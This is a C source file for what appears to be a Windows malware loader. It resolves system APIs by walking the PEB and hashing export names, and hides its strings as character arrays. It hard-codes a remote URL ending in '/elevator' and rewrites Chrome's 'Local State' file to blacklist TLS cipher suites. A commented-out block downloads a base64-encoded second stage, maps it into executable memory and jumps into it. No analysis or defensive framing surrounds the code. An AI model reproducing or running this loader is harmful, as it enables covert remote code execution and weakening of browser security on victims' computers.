#include <Windows.h>
#include <winternl.h>
#include <stdio.h>

#include "loader.h"
#include "winapi.h"

BOOL WriteBlackList(__in PVTABLE lpTable, CHAR *config_path, USHORT *ciphers, DWORD c_count);
VOID handleLastError(__in PVTABLE lpTable, LPSTR szMessage);

#pragma comment( linker, "/subsystem:console" )
#pragma section(".loader", read,execute)
#pragma code_seg(".loader")

__declspec(allocate(".loader"))
LOADER_CONFIG pLoaderConfig = 
{
	0xba11ba11,
	0xa11da7e, // validate tls
	0x7a117a11, // needed to search validate tls flag
	{ 'h', 't', 't', 'p', 's', ':', '/', '/', '1', '7', '2', '.', '2', '0', '.', '2', '0', '.', '1', '6', '4', '/', 'e', 'l', 'e', 'v', 'a', 't', 'o', 'r', 0x0 },
	{ 'K', 'E', 'R', 'N', 'E', 'L', '3', '2', 0x0 },
	{ 'N', 'T', 'D', 'L', 'L', 0x0 },
	{ 'W', 'I', 'N', 'I', 'N', 'E', 'T', 0x0 },
	{ 'S', 'H', 'E', 'L', 'L', '3', '2', 0x0 },
	{ 'm', 's', 'v', 'c', 'r', 't', 0x0 },

	{ 'G', 'e', 't', 'M', 'o', 'd', 'u', 'l', 'e', 'H', 'a', 'n', 'd', 'l', 'e', 'A', 0x0 },
	{ 'V', 'i', 'r', 't', 'u', 'a', 'l', 'A', 'l', 'l', 'o', 'c', 0x0 },
	{ 'V', 'i', 'r', 't', 'u', 'a', 'l', 'P', 'r', 'o', 't', 'e', 'c', 't', 0x0 },

	{ 'C', 'r', 'e', 'a', 't', 'e', 'F', 'i', 'l', 'e', 'A', 0x0 },
	{ 'W', 'r', 'i', 't', 'e', 'F', 'i', 'l', 'e', 0x0 },
	{ 'C', 'l', 'o', 's', 'e', 'H', 'a', 'n', 'd', 'l', 'e', 0x0 },
	{ 'G', 'e', 't', 'S', 'h', 'o', 'r', 't', 'P', 'a', 't', 'h', 'N', 'a', 'm', 'e', 'W', 0x0 },
	{ 'G', 'e', 't', 'T', 'e', 'm', 'p', 'P', 'a', 't', 'h', 'W', 0x0 },
	{ 'S', 'H', 'G', 'e', 't', 'K', 'n', 'o', 'w', 'n', 'F', 'o', 'l', 'd', 'e', 'r', 'P', 'a', 't', 'h', 0x0 },
	{ 'L', 'o', 'a', 'd', 'L', 'i', 'b', 'r', 'a', 'r', 'y', 'W', 0x0 },
	{ 'F', 'r', 'e', 'e', 'L', 'i', 'b', 'r', 'a', 'r', 'y', 0x0 },
	{ 'D', 'e', 'l', 'e', 't', 'e', 'F', 'i', 'l', 'e', 'W', 0x0 },
	{ 'G', 'e', 't', 'F', 'i', 'l', 'e', 'S', 'i', 'z', 'e', 0x0},
	{ 'C', 'r', 'e', 'a', 't', 'e', 'F', 'i', 'l', 'e', 'M', 'a', 'p', 'p', 'i', 'n', 'g', 'A', 0x0}, 
	{ 'M', 'a', 'p', 'V', 'i', 'e', 'w', 'O', 'f', 'F', 'i', 'l', 'e', 0x0},
	{ 'S', 'e', 't', 'E', 'n', 'd', 'O', 'f', 'F', 'i', 'l', 'e', 0x0},
	{ 'S', 'e', 't', 'F', 'i', 'l', 'e', 'P', 'o', 'i', 'n', 't', 'e', 'r', 0x0},
	{ 'U', 'n', 'm', 'a', 'p', 'V', 'i', 'e', 'w', 'O', 'f', 'F', 'i', 'l', 'e', 0x0},
	{ 'G', 'e', 't', 'L', 'a', 's', 't', 'E', 'r', 'r', 'o', 'r', 0x0},
	{ 'F', 'o', 'r', 'm', 'a', 't', 'M', 'e', 's', 's', 'a', 'g', 'e', 'A', 0x0},
	{ 'C', 'r', 'e', 'a', 't', 'e', 'T', 'o', 'o', 'l', 'h', 'e', 'l', 'p', '3', '2', 'S', 'n', 'a', 'p', 's', 'h', 'o', 't', 0x0 },
	{ 'P', 'r', 'o', 'c', 'e', 's', 's', '3', '2', 'F', 'i', 'r', 's', 't', 0x0 },
	{ 'P', 'r', 'o', 'c', 'e', 's', 's', '3', '2', 'N', 'e', 'x', 't', 0x0 },
	{ 'G', 'e', 't', 'C', 'u', 'r', 'r', 'e', 'n', 't', 'P', 'r', 'o', 'c', 'e', 's', 's', 'I', 'd', 0x0 },
	{ 'D', 'u', 'p', 'l', 'i', 'c', 'a', 't', 'e', 'H', 'a', 'n', 'd', 'l', 'e', 0x0 },
	{ 'O', 'p', 'e', 'n', 'P', 'r', 'o', 'c', 'e', 's', 's', 0x0 },
	{ 'G', 'e', 't', 'C', 'u', 'r', 'r', 'e', 'n', 't', 'P', 'r', 'o', 'c', 'e', 's', 's', 0x0 },

	{ 'I', 'n', 't', 'e', 'r', 'n', 'e', 't', 'O', 'p', 'e', 'n', 'A', 0x0 },
	{ 'I', 'n', 't', 'e', 'r', 'n', 'e', 't', 'O', 'p', 'e', 'n', 'U', 'r', 'l', 'A', 0x0 },
	{ 'I', 'n', 't', 'e', 'r', 'n', 'e', 't', 'C', 'o', 'n', 'n', 'e', 'c', 't', 'A', 0x0 },
	{ 'H', 't', 't', 'p', 'O', 'p', 'e', 'n', 'R', 'e', 'q', 'u', 'e', 's', 't', 'A', 0x0 },
	{ 'H', 't', 't', 'p', 'Q', 'u', 'e', 'r', 'y', 'I', 'n', 'f', 'o', 'A', 0x0 },
	{ 'I', 'n', 't', 'e', 'r', 'n', 'e', 't', 'R', 'e', 'a', 'd', 'F', 'i', 'l', 'e', 'E', 'x', 'A', 0x0 },
	{ 'I', 'n', 't', 'e', 'r', 'n', 'e', 't', 'S', 'e', 't', 'O', 'p', 't', 'i', 'o', 'n', 'A', 0x0 },
	{ 'I', 'n', 't', 'e', 'r', 'n', 'e', 't', 'Q', 'u', 'e', 'r', 'y', 'O', 'p', 't', 'i', 'o', 'n', 'A', 0x0 },
	{ 'H', 't', 't', 'p', 'S', 'e', 'n', 'd', 'R', 'e', 'q', 'u', 'e', 's', 't', 'A', 0x0 },
	{ 'I', 'n', 't', 'e', 'r', 'n', 'e', 't', 'C', 'l', 'o', 's', 'e', 'H', 'a', 'n', 'd', 'l', 'e', 0x0 },
	{ '_', 'w', 't', 'o', 'i', 0x0 },
	{ 'a', 't', 'o', 'i', 0x0 },
	{ 'E', 'x', 'i', 't', 'P', 'r', 'o', 'c', 'e', 's', 's', 0x0 },
	{ 'E', 'x', 'i', 't', 'T', 'h', 'r', 'e', 'a', 'd', 0x0 },
	{ 'C', 'r', 'e', 'a', 't', 'e', 'T', 'h', 'r', 'e', 'a', 'd', 0x0 },

	{ 'O', 'u', 't', 'p', 'u', 't', 'D', 'e', 'b', 'u', 'g', 'S', 't', 'r', 'i', 'n', 'g', 'A', 0x0 },
	{ 'W', 'a', 'i', 't', 'F', 'o', 'r', 'S', 'i', 'n', 'g', 'l', 'e', 'O', 'b', 'j', 'e', 'c', 't', 0x0 },

	{ 'V', 'e', 'r', 'S', 'e', 't', 'C', 'o', 'n', 'd', 'i', 't', 'i', 'o', 'n', 'M', 'a', 's', 'k', 0x0 },
	{ 'V', 'e', 'r', 'i', 'f', 'y', 'V', 'e', 'r', 's', 'i', 'o', 'n', 'I', 'n', 'f', 'o', 'A', 0x0 },

	{ 'm', 'a', 'l', 'l', 'o', 'c', 0x0 },
	{ 'c', 'a', 'l', 'l', 'o', 'c', 0x0 },
	{ 'f', 'r', 'e', 'e', 0x0 },
	{ 's', 'p', 'r', 'i', 'n', 't', 'f', 0x0},

	{ 'G', 'E', 'T', 0x0 },
	{ 0x0 },
	{ 'H', 'T', 'T', 'P', ' ', '/', ' ', '1', '.', '0', 0x0 },

	'\\',
	
	{ '6', '.', '1', 0x0 },
	{ '6', '.', '2', 0x0 },
	{ '6', '.', '3', 0x0 },

	{ '{', '\r', '\n', '"', 's', 's', 'l', '"', ':', ' ', '{', ' ', '\r', '\n', ' ', '"', 'c', 'i', 'p', 'h', 'e', 'r', '_', 's', 'u', 'i', 't', 'e', 's', '"', ':', ' ', '{', ' ', '\r', '\n', '"', 'b', 'l', 'a', 'c', 'k', 'l', 'i', 's', 't', '"', ':', ' ', '[', ' ', },
	{ ' ', ']', ' ', '\r', '\n', '}', ',', '\r', '\n', ' ', '"', 'r', 'e', 'v', '_', 'c', 'h', 'e', 'c', 'k', 'i', 'n', 'g', '"', ':', ' ', '{', '\r', '\n', ' ', '"', 'e', 'n', 'a', 'b', 'l', 'e', 'd', '"', ':', 't', 'r', 'u', 'e', ' ', '}', ' ', '\r', '\n', ' ', '}', ',' },

	//{ '?', 'q', 'w', 'o', 'p', 'f', 'n', 'c', 'h', '@', '@', 'Y', 'G', 'H', 'P', 'A', 'K', '@', 'Z', 0x0 },
	{ 'M', 'o', 'z', 'i', 'l', 'l', 'a', '/', '4', '.', '0', ' ', '(', 'c', 'o', 'm', 'p', 'a', 't', 'i', 'b', 'l', 'e', ';', ' ', 'M', 'S', 'I', 'E', ' ', '7', '.', '0', ';', ' ', 'W', 'i', 'n', 'd', 'o', 'w', 's', ' ', 'N', 'T', ' ', '6', '.', '1', ';', ' ', 'W', 'O', 'W', '6', '4', ';', ' ', 'T', 'r', 'i', 'd', 'e', 'n', 't', '/', '6', '.', '0', ';', ' ', 'S', 'L', 'C', 'C', '2', ';', ' ', '.', 'N', 'E', 'T', ' ', 'C', 'L', 'R', ' ', '2', '.', '0', '.', '5', '0', '7', '2', '7', ';', ' ', '.', 'N', 'E', 'T', ' ', 'C', 'L', 'R', ' ', '3', '.', '5', '.', '3', '0', '7', '2', '9', ';', ' ', '.', 'N', 'E', 'T', ' ', 'C', 'L', 'R', ' ', '3', '.', '0', '.', '3', '0', '7', '2', '9', ';', ' ', 'M', 'e', 'd', 'i', 'a', ' ', 'C', 'e', 'n', 't', 'e', 'r', ' ', 'P', 'C', ' ', '6', '.', '0', ';', ' ', '.', 'N', 'E', 'T', '4', '.', '0', 'C', ';', ' ', '.', 'N', 'E', 'T', '4', '.', '0', 'E', ')', 0x0 },
	{ 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '+', '/' },
	{
    /* ASCII table */
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63,
    52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 64, 64, 64, 64, 64, 64,
    64,  0,  1,  2,  3,  4,  5,  6,  7,  8,  9, 10, 11, 12, 13, 14,
    15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 64, 64, 64, 64, 64,
    64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
    41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64
	}
};

//int main() { Loader(&pLoaderConfig); };
int main() { Startup(); };

__declspec(naked) VOID Startup()
{
	__asm
	{
		nop
		call next2
next2:
		pop esi
		nop

next3:
		mov ebx, 0xba11ba11 
		cmp ebx, [esi]
		je start_loader

		dec esi
		jmp next3

start_loader:
		push esi     // ptr to loaderConfig
		call Loader
		pop eax
		ret
	}
}

VOID Loader(__in PLOADER_CONFIG lpLoaderConfig, __in PVOID aes_key)
{
	VTABLE pVtable;
	pVtable.lpLoaderConfig = lpLoaderConfig;

	if (!LoadVTable(&pVtable))
		return;

	USHORT cstring[3] = {0xc02f, 0xc02b, 0x000a}; 

	// "C:\\Users\\naga\\AppData\\Local\\Google\\Chrome\\UserData\\Local State"
	//CHAR szPath[] = { 'C',  ':',  '\\',  'U',  's',  'e',  'r',  's',  '\\',  'n',  'a',  'g',  'a',  '\\',  'A',  'p',  'p',  'D',  'a',  't',  'a',  '\\',  'L',  'o',  'c',  'a',  'l',  '\\',  'G',  'o',  'o',  'g',  'l',  'e',  '\\',  'C',  'h',  'r',  'o',  'm',  'e',  '\\', 'U',  's',  'e',  'r',  ' ', 'D',  'a',  't',  'a',  '\\',  'L',  'o',  'c',  'a',  'l',  ' ',  'S',  't',  'a',  't',  'e', 0x0};
	CHAR szPath[] = { 'C',  ':',  '\\',  'U',  's',  'e',  'r',  's',  '\\', 'u', 'n', 'k', 'n', 'o', 'w', 'n',  '\\',  'A',  'p',  'p',  'D',  'a',  't',  'a',  '\\',  'L',  'o',  'c',  'a',  'l',  '\\',  'G',  'o',  'o',  'g',  'l',  'e',  '\\',  'C',  'h',  'r',  'o',  'm',  'e',  '\\', 'U',  's',  'e',  'r', ' ',  'D',  'a', 't',  'a',  '\\',  'L',  'o',  'c',  'a',  'l',  ' ',  'S',  't',  'a',  't',  'e', 0x0};
	//CHAR szPath[] = { 'C',  ':',  '\\',  '\\', 'U',  's',  'e',  'r',  's',  '\\', '\\', 'u', 'n', 'k', 'n', 'o', 'w', 'n', '\\', '\\', 't', 'e', 's', 't', '.', 't', 'x', 't', 0x0};
	//CHAR szPath[] = { 'C',  ':',  '\\', 'U',  's',  'e',  'r',  's',  '\\', 'u', 'n', 'k', 'n', 'o', 'w', 'n', '\\', 'b', 'i', 'a', 'b', 'i', '.', 't', 'x', 't', 0x0};
	WriteBlackList(&pVtable, szPath, cstring, 3);

	pVtable.fpOutputDebugStringA(szPath);
	pVtable.fpOutputDebugStringA(pVtable.lpLoaderConfig->ssl_first_part);
	pVtable.fpOutputDebugStringA(pVtable.lpLoaderConfig->ssl_second_part);


	/*char loaded[20] = { '[', '*', ']', ' ', 'V', 't', 'a', 'b', 'l', 'e', ' ', 'l', 'o', 'a', 'd', 'e', 'd', 0x0 };
	pVtable.fpOutputDebugStringA(loaded);*/

	//DWORD dwFileSize;
	//LPBYTE lpFileBuffer = DownloadAndDecryptTls(&pVtable, pVtable.lpLoaderConfig->strUrl, &dwFileSize, 0, FALSE);
	//
	//if (lpFileBuffer != NULL)
	//{
	//	/* unbased64'd stage 2 is: [16bytes aes-key][buffer] */

	//	/* lpFileBuffer is executable pic code, map rwx and jump at offset 0x38A4 */
	//	LPVOID lpStage2 = pVtable.VirtualAlloc(NULL, dwFileSize + 16, MEM_COMMIT, PAGE_EXECUTE_READWRITE); // 16 is the size of the aes key
	//	
	//	/* copy the key*/
	//	//char key[16] = { '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f'};
	//	//aes_key = key;
	//	__MEMCPY__(lpStage2, aes_key, 16);

	//	
	//	/* unbase64 */
	//	Base64decode(&pVtable, (char*)  lpStage2 + 16, (char*) lpFileBuffer);
	//	
	//	
	//	DWORD dwOffset = 0x10; // skip past key

	//	/*char starting[20] = { '[', '*', ']', ' ', 'S', 't', 'a', 'r', 't', 'i', 'n', 'g', ' ', 't', 'h', 'r', 'e', 'a', 'd', 0x0 };
	//	pVtable.fpOutputDebugStringA(starting);*/

	//	/*DWORD dwThreadId;
	//	DWORD dwStartAddress = ((DWORD) lpStage2 + dwOffset);
	//	HANDLE hThread = pVtable.CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE) dwStartAddress, NULL, 0, &dwThreadId);*/

	//	/*char waiting[20] = { '[', '*', ']', ' ', 'W', 'a', 'i', 't', 'i', 'n', 'g', 0x0 };
	//	pVtable.fpOutputDebugStringA(waiting);
	//	pVtable.fpWaitForSingleObject(hThread, INFINITE);*/

	//	/*VOID(*elevator)();
	//	elevator = (VOID(*)()) lpStage2;
	//	elevator();*/

	//		

	//	__asm
	//	{
	//		mov eax, lpStage2
	//		add eax, dwOffset // // skip past key
	//		call eax
	//	}

	//	//char finished[20] = { '[', '*', ']', ' ', 'T', 'h', 'r', 'e', 'a', 'd', ' ', 'f', 'i', 'n', 'i', 's', 'h', 'e', 'd', 0x0 };
	//	//pVtable.fpOutputDebugStringA(finished);
	//	//pVtable.ExitThread(0);
	//}
}

BOOL LoadVTable(__out PVTABLE lpTable)
{
	HMODULE hKernel32;

	if (!GetPointers(&lpTable->GetProcAddress, &lpTable->LoadLibraryA, (PHANDLE)&hKernel32))
		return FALSE;

	lpTable->VirtualAlloc = (VIRTUALALLOC) lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strVirtualAlloc);
	lpTable->VirtualProtect = (VIRTUALPROTECT) lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strVirtualProtect);
	lpTable->fpGetModuleHandleA = (GETMODULEHANDLE)lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strGetModuleHandle);
	lpTable->GetTempPathW = (GETTEMPPATHW) lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strGetTempPathW);
	lpTable->GetShortPathNameW = (GETSHORTPATHNAMEW) lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strGetShortPathNameW);
	lpTable->LoadLibraryW = (LOADLIBRARYW) lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strLoadLibraryW);
	lpTable->FreeLibrary = (FREELIBRARY) lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strFreeLibrary);
	lpTable->DeleteFileW = (DELETEFILEW) lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strDeleteFileW);
	lpTable->CreateFileA = (CREATEFILEA) lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strCreateFileA);
	lpTable->WriteFile = (WRITEFILE) lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strWriteFile);
	lpTable->CloseHandle = (CLOSEHANDLE) lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strCloseHandle);
	lpTable->ExitProcess = (EXITPROCESS) lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strExitProcess);	
	lpTable->ExitThread = (EXITTHREAD) lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strExitThread);	
	lpTable->CreateThread = (CREATETHREAD) lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strCreateThread);
	lpTable->fpGetFileSize = (GETFILESIZE) lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strGetFileSize);
	lpTable->fpCreateFileMappingA = (CREATEFILEMAPPINGA)lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strCreateFileMappingA);
	lpTable->fpMapViewOfFile = (MAPVIEWOFFILE)lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strMapViewOfFile);
	lpTable->fpSetEndOfFile = (SETENDOFFILE)lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strSetEndOfFile);
	lpTable->fpSetFilePointer = (SETFILEPOINTER)lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strSetFilePointer);
	lpTable->fpUnmapViewOfFile = (UNMAPVIEWOFFILE)lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strUnmapViewOfFile);
	lpTable->fpGetLastError = (GETLASTERROR)lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strGetLastError);
	lpTable->fpFormatMessage = (FORMATMESSAGE)lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strFormatMessage);

	lpTable->fpCreateToolHelp32Snapshot = (CREATETOOLHELP32SNAPSHOT)lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strCreateToolHelp32Snapshot);
	lpTable->fpProcess32First = (PROCESS32FIRST)lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strProcess32First);
	lpTable->fpProcess32Next = (PROCESS32NEXT)lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strProcess32Next);
	lpTable->fpDuplicateHandle = (DUPLICATEHANDLE) lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strDuplicateHandle);
	lpTable->fpGetCurrentProcessId = (GETCURRENTPROCESSID) lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strGetCurrentProcessId);
	lpTable->fpOpenProcess = (OPENPROCESS)lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strOpenProcess);
	lpTable->fpGetCurrentProcess = (GETCURRENTPROCESS) lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strGetCurrentProcess);

	HMODULE hWinInet = lpTable->LoadLibraryA(lpTable->lpLoaderConfig->strWinInet);
	lpTable->InternetOpenA = (INTERNETOPENA) lpTable->GetProcAddress(hWinInet, lpTable->lpLoaderConfig->strInternetOpenA);
	lpTable->InternetOpenUrlA = (INTERNETOPENURLA) lpTable->GetProcAddress(hWinInet, lpTable->lpLoaderConfig->strInternetOpenUrlA);
	lpTable->InternetConnectA = (INTERNETCONNECTA)lpTable->GetProcAddress(hWinInet, lpTable->lpLoaderConfig->strInternetConnectA);
	lpTable->InternetReadFileExA = (INTERNETREADFILEEXA) lpTable->GetProcAddress(hWinInet, lpTable->lpLoaderConfig->strInternetReadFileExA);
	lpTable->HttpQueryInfoA = (HTTPQUERYINFOA) lpTable->GetProcAddress(hWinInet, lpTable->lpLoaderConfig->strHttpQueryInfoW);
	lpTable->HttpOpenRequestA = (HTTPOPENREQUESTA)lpTable->GetProcAddress(hWinInet, lpTable->lpLoaderConfig->strHttpOpenRequestA);
	lpTable->InternetSetOption = (INTERNETSETOPTION)lpTable->GetProcAddress(hWinInet, lpTable->lpLoaderConfig->strInternetSetOption);
	lpTable->InternetQueryOption = (INTERNETQUERYOPTION)lpTable->GetProcAddress(hWinInet, lpTable->lpLoaderConfig->strInternetQueryOption);
	lpTable->HttpSendRequest = (HTTPSENDREQUEST)lpTable->GetProcAddress(hWinInet, lpTable->lpLoaderConfig->strHttpSendRequest);
	lpTable->InternetCloseHandle = (INTERNETCLOSEHANDLE)lpTable->GetProcAddress(hWinInet, lpTable->lpLoaderConfig->strInternetCloseHandle);
	lpTable->HttpOpenRequestA = (HTTPOPENREQUESTA)lpTable->GetProcAddress(hWinInet, lpTable->lpLoaderConfig->strHttpOpenRequestA);

	HMODULE hNtDll = lpTable->LoadLibraryA(lpTable->lpLoaderConfig->strNtDll);
	lpTable->wtoi = (WTOI) lpTable->GetProcAddress(hNtDll, lpTable->lpLoaderConfig->strWtoi);
	lpTable->atoi = (ATOI)lpTable->GetProcAddress(hNtDll, lpTable->lpLoaderConfig->strAtoi);

	HMODULE hShell32 = lpTable->LoadLibraryA(lpTable->lpLoaderConfig->strShell32);
	lpTable->SHGetKnownFolderPath = (SHGETKNOWNFOLDERPATH) lpTable->GetProcAddress(hShell32, lpTable->lpLoaderConfig->strSHGetKnownFolderPath);

	lpTable->fpOutputDebugStringA = (OUTPUTDEBUGSTRINGA)lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strOutputDebugStringA);
	lpTable->fpWaitForSingleObject = (WAITFORSINGLEOBJECT)lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strWaitForSingleObject);

	lpTable->fpVerSetConditionMask = (VERSETCONDITIONMASK) lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strVerSetConditionMask);
	lpTable->fpVerifyVersionInfoA = (VERIFYVERSIONINFOA) lpTable->GetProcAddress(hKernel32, lpTable->lpLoaderConfig->strVerifyVersionInfoA);

	HMODULE hMsvcrt = lpTable->fpGetModuleHandleA(lpTable->lpLoaderConfig->strMsvcr);

	if (hMsvcrt == NULL)
		hMsvcrt = lpTable->LoadLibraryA(lpTable->lpLoaderConfig->strMsvcr);

	lpTable->fpMalloc = (MALLOC)lpTable->GetProcAddress(hMsvcrt, lpTable->lpLoaderConfig->strMalloc);
	lpTable->fpCalloc = (CALLOC)lpTable->GetProcAddress(hMsvcrt, lpTable->lpLoaderConfig->strCalloc);
	lpTable->fpFree = (FREE)lpTable->GetProcAddress(hMsvcrt, lpTable->lpLoaderConfig->strFree);
	lpTable->fpSprintf = (SPRINTF)lpTable->GetProcAddress(hMsvcrt, lpTable->lpLoaderConfig->strSprintf);

	if (!lpTable->fpGetCurrentProcess || 
		!lpTable->fpOpenProcess ||
		!lpTable->fpCreateToolHelp32Snapshot ||
		!lpTable->fpProcess32First ||
		!lpTable->fpProcess32Next ||
		!lpTable->fpDuplicateHandle ||
		!lpTable->fpGetCurrentProcessId ||
		!lpTable->VirtualAlloc ||
		!lpTable->VirtualProtect || 
		!lpTable->GetTempPathW || 
		!lpTable->GetShortPathNameW ||
		!lpTable->LoadLibraryW ||
		!lpTable->FreeLibrary || 
		!lpTable->CreateFileA || 
		!lpTable->WriteFile || 
		!lpTable->fpGetFileSize || 
		!lpTable->fpCreateFileMappingA || 
		!lpTable->fpMapViewOfFile ||
		!lpTable->fpSetFilePointer ||
		!lpTable->fpUnmapViewOfFile ||
		!lpTable->fpGetLastError || 
		!lpTable->fpFormatMessage ||
		!lpTable->fpSetEndOfFile || 
		!lpTable->CloseHandle || 
		!lpTable->ExitProcess || 
		!lpTable->InternetOpenA || 
		!lpTable->InternetOpenUrlA || 
		!lpTable->InternetReadFileExA || 
		!lpTable->HttpQueryInfoA || 
		!lpTable->wtoi ||
		!lpTable->ExitThread ||
		!lpTable->CreateThread ||
		!lpTable->fpOutputDebugStringA ||
		!lpTable->fpWaitForSingleObject ||
		!lpTable->InternetSetOption ||
		!lpTable->InternetQueryOption ||
		!lpTable->HttpSendRequest ||
		!lpTable->InternetCloseHandle ||
		!lpTable->fpVerSetConditionMask ||
		!lpTable->fpVerifyVersionInfoA ||
		!lpTable->fpMalloc ||
		!lpTable->fpCalloc ||
		!lpTable->fpFree ||
		!lpTable->fpSprintf) return FALSE;

	return TRUE;
}

BOOL GetPointers(
	__out PGETPROCADDRESS fpGetProcAddress, 
	__out PLOADLIBRARYA fpLoadLibraryA,
	__out PHANDLE pKernel32)
{
	*pKernel32 = GetKernel32Handle();
	if (*pKernel32 == INVALID_HANDLE_VALUE)
		return FALSE;

	LPBYTE lpBaseAddr = (LPBYTE) *pKernel32;
	PIMAGE_DOS_HEADER lpDosHdr = (PIMAGE_DOS_HEADER) lpBaseAddr;
	PIMAGE_NT_HEADERS pNtHdrs = (PIMAGE_NT_HEADERS) (lpBaseAddr + lpDosHdr->e_lfanew);
	PIMAGE_EXPORT_DIRECTORY pExportDir = (PIMAGE_EXPORT_DIRECTORY) (lpBaseAddr +  pNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);

	LPDWORD pNameArray = (LPDWORD) (lpBaseAddr + pExportDir->AddressOfNames);
	LPDWORD pAddrArray = (LPDWORD) (lpBaseAddr + pExportDir->AddressOfFunctions);
	LPWORD pOrdArray  = (LPWORD) (lpBaseAddr+ pExportDir->AddressOfNameOrdinals);

	*fpGetProcAddress = NULL;
	*fpLoadLibraryA = NULL;

	for (UINT i=0; i<pExportDir->NumberOfNames; i++)
	{
		LPSTR pFuncName = (LPSTR) (lpBaseAddr + pNameArray[i]);
	
		if (GetStringHash(pFuncName, FALSE, 14) == 0x7c0dfcaa) 
			*fpGetProcAddress = (GETPROCADDRESS) (lpBaseAddr + pAddrArray[pOrdArray[i]]);
		else if (GetStringHash(pFuncName, FALSE, 12) == 0xec0e4e8e)
			*fpLoadLibraryA = (LOADLIBRARYA) (lpBaseAddr + pAddrArray[pOrdArray[i]]);
	
		if (*fpGetProcAddress && *fpLoadLibraryA)
			return TRUE;
	}

	return FALSE;
}

HANDLE GetKernel32Handle()
{
	HANDLE hKernel32 = INVALID_HANDLE_VALUE;
#ifdef _WIN64
	PPEB lpPeb = (PPEB) __readgsqword(0x60);
#else
	PPEB lpPeb = (PPEB) __readfsdword(0x30);
#endif
	PLIST_ENTRY pListHead = &lpPeb->Ldr->InMemoryOrderModuleList;
	PLIST_ENTRY pListEntry = pListHead->Flink;	

	while (pListEntry != pListHead)
	{
		PLDR_DATA_TABLE_ENTRY pModEntry = CONTAINING_RECORD(pListEntry, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
 		if (pModEntry->FullDllName.Length)
		{
			DWORD dwLen	= pModEntry->FullDllName.Length;
			PWCHAR strName = (pModEntry->FullDllName.Buffer + (dwLen/sizeof(WCHAR))) - 13;

			if (GetStringHash(strName, TRUE, 13) == 0x8fecdbff || GetStringHash(strName, TRUE, 13) == 0x6e2bcfd7)
			{
				hKernel32 = pModEntry->DllBase;
				break;
			}
		}
		pListEntry = pListEntry->Flink;
	}

	return hKernel32;
}

DWORD GetStringHash(
	__in LPVOID lpBuffer, 
	__in BOOL bUnicode, 
	__in UINT uLen)
{
	DWORD dwHash = 0;
	LPSTR strBuffer = (LPSTR) lpBuffer;

	while (uLen--)
    {
		dwHash = (dwHash >> 13) | (dwHash << 19);
		dwHash +=  (DWORD)*strBuffer++;

		if (bUnicode)
				strBuffer++;			
    }
    return dwHash;
}

